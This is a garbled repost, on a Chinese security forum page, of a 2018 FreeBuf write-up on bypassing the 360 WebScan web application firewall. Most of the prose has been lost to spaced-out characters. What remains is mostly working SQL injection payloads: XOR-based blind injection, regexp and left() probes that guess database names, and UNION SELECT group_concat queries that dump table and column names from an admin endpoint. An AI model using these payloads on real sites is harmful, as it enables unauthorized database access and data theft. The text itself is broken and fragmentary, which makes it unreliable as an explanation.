[13365] 2018-11-01_记一次对WebScan的Bypass

文档创建者:s7ckTeam
浏览次数:4
最后更新:2025-01-18
2018-11-01_记一次对WebScan的Bypass W e b S c a n B y p a s s   G G y a o 6   F r e e B u f   2 0 1 8 - 1 1 - 0 1 * G G y a o 6   F r e e B u f   P S 3 6 0 w e b s c a n 便 便 b y p a s s 1 .   使 a n d   1 = 1 o r ^ 使 x o r 使 使 h t t p s : / / b l o g . c s d n . n e t / z p y 1 9 9 8 z p y / a r t i c l e / d e t a i l s / 8 0 6 6 7 7 7 5 1 ^ 1 = 0 1 ^ 0 = 1 0 ^ 0 = 0
p a y l o a d 3 .   使 使 P a y l o a d b p i n t r u d e r x x x n i d = 2 1 6 ^ ( 1 = 1 ) ^ 1 x x x n i d = 2 1 6 ^ ( 1 = ( i f ( 1 = ( l e n g t h ( d a t a b a s e ( ) ) = 1   ) , 1 , 0 ) ) ) ^ 1
p a y l o a d   t y p e n u m b e r s 1 - 1 5 1 5 1 3 4 .   使 使 使 r e g e x p s e l e c t   u s e r ( )   r e g e x p   ^ [ a - z ] ;
l i k e l e f t ( ) m i d ( ) s u b s t r ( ) P a y l o a d 使 使 p s e l e c t   u s e r ( )   r e g e x p   ^ r [ a - z ] ; x x x n i d = 2 1 6 ^ ( 1 = i f ( ( ( d a t a b a s e ( ) ) r e g e x p   ' ^ a   '   ) , 1 , 0 ) ) ^ 1
5 .   p a y l o a d 使 l e f t ( ) p a y l o a d 3 6 0 w e b s c a n f r o m f r o m s e l e c t   l e f t ( ( s e l e c t   t a b l e _ n a m e   f r o m i n f o r m a t i o n _ s c h e m a . t a b l e s   w h e r e   t a b l e _ s c h e m a = ' t e s t '   l i m i t   0 , 1 ) , 1 ) = ' u ' ; x x x n i d = 2 1 6 ^ ( 1 = l e f t ( ( s e l e c t   t a b l e _ n a m e f r o m   i n f o r m a t i o n _ s c h e m a . t a b l e s   w h e r e   t a b l e _ s c h e m a = d a t a b a s e ( )   l i m i t 0 , 1 ) , 1 ) = ' u ' ) ^ 1
6 .   3 6 0 w e b s c a n 3 6 0 w e b s c a n U R L a d m i n 3 6 0 w e b s c a n h t t p s : / / w w w . l e a v e s o n g s . c o m / p e n e t r a t i o n / 3 6 0 w e b s c a n - b y p a s s . h t m l 西 3 6 0 w e b s c a n h t t p s : / / g i t h u b . c o m / b a i q j / h o s t _ m a n a g e r / t r e e / m a s t e r / o t h e r / 3 6 0 s a f e p a y l o a d 7 .   x x x / x x x / a d m i n   / ? n i d = 2 1 6   u n i o n   s e l e c t   1 , 2 , 3 , 4 , 5 , 6 , 7 , 8   - -   - P a y l o a d x x x / x x x / a d m i n / ? n i d = 1 u n i o n   s e l e c t   d a t a b a s e ( ) , 2 , 3 , 4 , 5 , 6 , 7 , 8   - -   -
P a y l o a d P a y l o a d P a y l o a d 1 .   使 a n d o r w a f 姿 2 .   i d x x x / x x x / a d m i n / ? n i d = 1   u n i o n s e l e c t   g r o u p _ c o n c a t ( t a b l e _ n a m e ) , 2 , 3 , 4 , 5 , 6 , 7 , 8   f r o m   i n f o r m a t i o n _ s c h e m a . t a b l e s w h e r e   t a b l e _ s c h e m a = d a t a b a s e ( )   - -   - x x x / x x x / a d m i n / ? n i d = 1 u n i o n   s e l e c t   g r o u p _ c o n c a t ( c o l u m n _ n a m e ) , 2 , 3 , 4 , 5 , 6 , 7 , 8   f r o m i n f o r m a t i o n _ s c h e m a . c o l u m n s   w h e r e   t a b l e _ n a m e = ' '   - -   - x x x / x x x / a d m i n / ? n i d = 1 u n i o n   s e l e c t   g r o u p _ c o n c a t ( 1 ) , g r o u p _ c o n c a t ( 2 ) , 3 , 4 , 5 , 6 , 7 , 8   f r o m     - -   -
3 .   a d m i n * G G y a o 6   F r e e B u f  
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则